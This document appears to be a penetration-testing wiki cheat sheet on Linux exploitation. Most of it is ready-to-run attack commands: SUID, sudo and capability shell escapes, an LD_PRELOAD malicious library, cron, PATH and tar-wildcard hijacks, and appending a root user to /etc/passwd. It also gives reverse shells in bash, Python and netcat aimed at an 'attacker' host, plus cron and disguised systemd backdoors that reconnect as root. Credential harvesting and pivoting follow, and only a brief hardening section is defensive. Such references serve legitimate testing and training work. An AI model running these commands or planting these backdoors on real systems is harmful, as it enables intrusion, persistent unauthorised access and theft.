Linux Security and Exploitation

This comprehensive guide covers Linux security assessment, from initial enumeration through post-exploitation. It synthesizes techniques for discovering vulnerabilities, escalating privileges, and maintaining access in Linux environments.

System Enumeration

Manual Enumeration

System Information

 
# Basic system information
uname -a                    # Complete system information
cat /etc/issue             # Distribution info
cat /etc/*-release         # Distribution details
hostnamectl                # Hostname and OS info
cat /proc/version          # Kernel compilation info
 
 
# Hardware information
lscpu                      # CPU architecture details
free -h                    # Memory information
df -h                      # Disk usage
lsblk                      # Block devices

User Enumeration

 
# Current user context
whoami                     # Current username
id                        # User ID and group memberships
sudo -l                   # Sudo privileges
 
 
# All users
cat /etc/passwd           # User accounts
cat /etc/shadow           # Password hashes (if readable)
getent passwd             # All users including LDAP
last                      # Login history
w                         # Currently logged in users

Network Information

 
# Network configuration
ip a                      # IP addresses
ip route                  # Routing table
ss -tulpn                 # Socket statistics
netstat -antup           # All connections
 
 
# DNS and hosts
cat /etc/resolv.conf     # DNS servers
cat /etc/hosts           # Local host mappings

Process and Services

 
# Running processes
ps aux                   # All processes
pstree                   # Process tree
 
 
# Services
systemctl list-units --type=service --state=running

Scheduled Tasks

 
# System-wide cron jobs
cat /etc/crontab
ls -la /etc/cron.*
 
 
# User cron jobs
crontab -l               # Current user
ls -la /var/spool/cron/crontabs/
 
 
# Systemd timers
systemctl list-timers

Automated Enumeration Tools

LinPEAS

 
# Download and execute
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
 
# Save output
./linpeas.sh | tee linpeas_output.txt

LinEnum

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh -t

pspy - Process Monitoring

 
# Monitor processes without root
./pspy64 -f    # Monitor file system events
./pspy64 -p    # Monitor processes

Privilege Escalation Vectors

SUID/SGID Exploitation

Finding SUID Files

 
# Find SUID files
find / -type f -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
 
 
# Find both SUID and SGID
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

Common SUID Exploits

 
# Find command exploitation
find . -exec /bin/sh \; -quit
 
 
# Vim exploitation
vim -c ':!/bin/sh'
 
 
# Less exploitation
less /etc/profile
!/bin/sh
 
 
# AWK exploitation
awk 'BEGIN {system("/bin/sh")}'
 
 
# Perl exploitation
perl -e 'exec "/bin/sh";'

Sudo Exploitation

 
# Check sudo permissions
sudo -l
sudo -ll
 
 
# Common sudo exploits (GTFOBins)
sudo vim -c ':!/bin/sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'

LD_PRELOAD Exploitation

 
# Create malicious shared library
echo 'void _init() {system("/bin/bash");}' > /tmp/pe.c
gcc -fPIC -shared -o /tmp/pe.so /tmp/pe.c -nostartfiles
sudo LD_PRELOAD=/tmp/pe.so program_name

Linux Capabilities

 
# Find files with capabilities
getcap -r / 2>/dev/null
 
 
# Python with cap_setuid
python3 -c "import os; os.setuid(0); os.system('/bin/sh')"
 
 
# Perl with cap_setuid  
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/sh";'

Cron Job Exploitation

Enumeration

 
# System cron jobs
cat /etc/crontab
ls -la /etc/cron*
 
 
# Monitor cron execution with pspy
./pspy64 -f -i 1000

Attack Vectors

Writable Script

 
# If cron runs a writable script
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cronjob.sh

PATH Manipulation

 
# Create malicious binary
cat > /tmp/ls << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
EOF
chmod +x /tmp/ls
export PATH=/tmp:$PATH

Wildcard Injection

 
# If cron uses wildcards (tar czf backup.tgz *)
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh
chmod +x shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'

Kernel Exploits

 
# Check kernel version
uname -r
cat /proc/version
 
 
# Common exploits
 
# DirtyCOW (CVE-2016-5195) - Kernel 2.6.22 < 3.9
 
# PwnKit (CVE-2021-4034) - PolicyKit
 
# Sudo Baron Samedit (CVE-2021-3156) - sudo < 1.9.5p2

Writable Files Exploitation

/etc/passwd Exploitation

 
# Generate password hash
openssl passwd -1 -salt hacker hacker123
 
# Add new root user
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash' >> /etc/passwd

NFS Exploitation

 
# Check for NFS exports
showmount -e target
 
 
# No_root_squash exploitation
 
# On attacker (as root):
mount -t nfs target:/share /tmp/nfs
cp /bin/bash /tmp/nfs/shell
chmod +s /tmp/nfs/shell
 
# On target:
/share/shell -p

Docker Container Escape

 
# Check if in container
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker
 
 
# Docker group privilege escalation
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
 
 
# Privileged container escape
mount /dev/sda1 /mnt/host
chroot /mnt/host bash

Common Vulnerabilities

Path Hijacking

 
# Find programs using relative paths
strings /usr/bin/program | grep -E '^[a-z]+$'
 
 
# Create malicious binary
cat > /tmp/service << 'EOF'
#!/bin/bash
/bin/bash -p
EOF
chmod +x /tmp/service
 
 
# Hijack PATH
PATH=/tmp:$PATH /usr/bin/vulnerable_program

Wildcard Exploitation

 
# TAR wildcard exploitation
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh
chmod +x shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'

Race Conditions

 
# Symbolic link race condition
while true; do
    ln -sf /etc/shadow /tmp/vulnerable_file
    ln -sf /tmp/my_file /tmp/vulnerable_file
done

Shell Techniques

Reverse Shells

Bash

bash -i >& /dev/tcp/attacker/4444 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Netcat

 
# Traditional netcat
nc -e /bin/sh attacker 4444
 
 
# Netcat without -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker 4444 >/tmp/f

Shell Stabilization

 
# Python TTY upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
 
# Ctrl-Z, then:
stty raw -echo; fg
 
# In shell:
reset

Persistence Mechanisms

SSH Key Persistence

 
# Generate SSH keys
ssh-keygen -t rsa -f /tmp/backdoor_key
 
 
# Add to authorized_keys
mkdir -p ~/.ssh
echo 'ssh-rsa AAAAB3NzaC1... backdoor@attacker' >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Cron Job Persistence

 
# User crontab
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'") | crontab -
 
 
# System-wide cron
echo '* * * * * root nc attacker 4444 -e /bin/bash' > /etc/cron.d/backdoor

Systemd Service Persistence

cat > /etc/systemd/system/backdoor.service << 'EOF'
[Unit]
Description=System Monitoring Service
After=network.target
 
[Service]
Type=simple
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"
Restart=always
User=root
 
[Install]
WantedBy=multi-user.target
EOF
 
systemctl daemon-reload
systemctl enable backdoor.service

Post-Exploitation

Information Gathering

 
# Credential harvesting
find /home -name ".bash_history" 2>/dev/null
find / -name "wp-config.php" 2>/dev/null
grep -r "password" /etc 2>/dev/null | grep -v Binary
 
 
# Network mapping
arp -a
ip route
for port in {1..65535}; do
    timeout 1 bash -c "echo >/dev/tcp/target/$port" && echo "Port $port open"
done

Pivoting

 
# SSH port forwarding
ssh -L 8080:internal_target:80 user@jumphost
ssh -D 1080 user@target  # SOCKS proxy
 
 
# Socat relay
socat TCP-LISTEN:8080,fork TCP:target:80

Security Hardening

File Permissions

 
# Find world-writable files
find / -perm -002 -type f 2>/dev/null
 
 
# Fix permissions
chmod 600 /etc/shadow
chmod 644 /etc/passwd

Service Hardening

 
# Disable unnecessary services
systemctl disable service_name
systemctl mask service_name
 
 
# Firewall configuration
ufw enable
ufw default deny incoming
ufw allow ssh

Quick Reference

One-Liner Enumeration

 
# System info
(hostname; id; uname -a; cat /etc/issue) 2>/dev/null
 
 
# SUID files
find / -perm -4000 -type f 2>/dev/null | head -20
 
 
# Capabilities
getcap -r / 2>/dev/null

Quick Shells

 
# Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
 
 
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Essential Tools

Tool	Purpose
LinPEAS	Comprehensive enumeration
GTFOBins	Binary exploitation reference
pspy	Process monitoring without root
Chisel	TCP/UDP tunneling

Reconnaissance-and-Information-Gathering - Initial foothold techniques
Windows-Security-and-Exploitation - Cross-platform comparison
Active-Directory-Security - Windows domain exploitation
Network-Security-and-Services - Network-level attacks
Tools-and-Methodologies - Linux-specific tools

Cross-References

Enumeration: Start with Network Discovery
Privilege Escalation Tools: Check System Tools
Post-Exploitation: Learn Windows Persistence for comparison

SverzBlog

Explorer